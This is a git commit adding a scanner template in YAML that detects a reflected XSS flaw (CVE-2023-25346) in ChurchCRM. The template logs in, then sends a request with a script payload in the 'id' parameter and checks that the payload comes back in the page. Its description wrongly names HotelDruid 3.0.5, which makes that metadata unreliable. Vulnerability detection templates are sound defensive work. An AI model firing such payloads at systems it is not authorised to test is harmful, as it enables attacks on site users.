Create CVE-2023-25346.yaml
parent
1d2c8776a8
commit
d4a2b2d514
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2023-25346
|
||||
|
||||
info:
|
||||
name: ChurchCMS - Reflected XSS
|
||||
author: Harsh
|
||||
severity: medium
|
||||
description: |
|
||||
A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.
|
||||
reference:
|
||||
- https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-25346
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-25346
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2023,churchCMS,reflected,xss,auth
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /churchcrm/session/begin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
User={{username}}&Password={{password}}
|
||||
|
||||
- |
|
||||
GET /churchcrm/v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "<script>alert(document.domain)</script>")'
|
||||
- 'contains(body_2, "ChurchCRM")'
|
||||
condition: and
|
Loading…
Reference in New Issue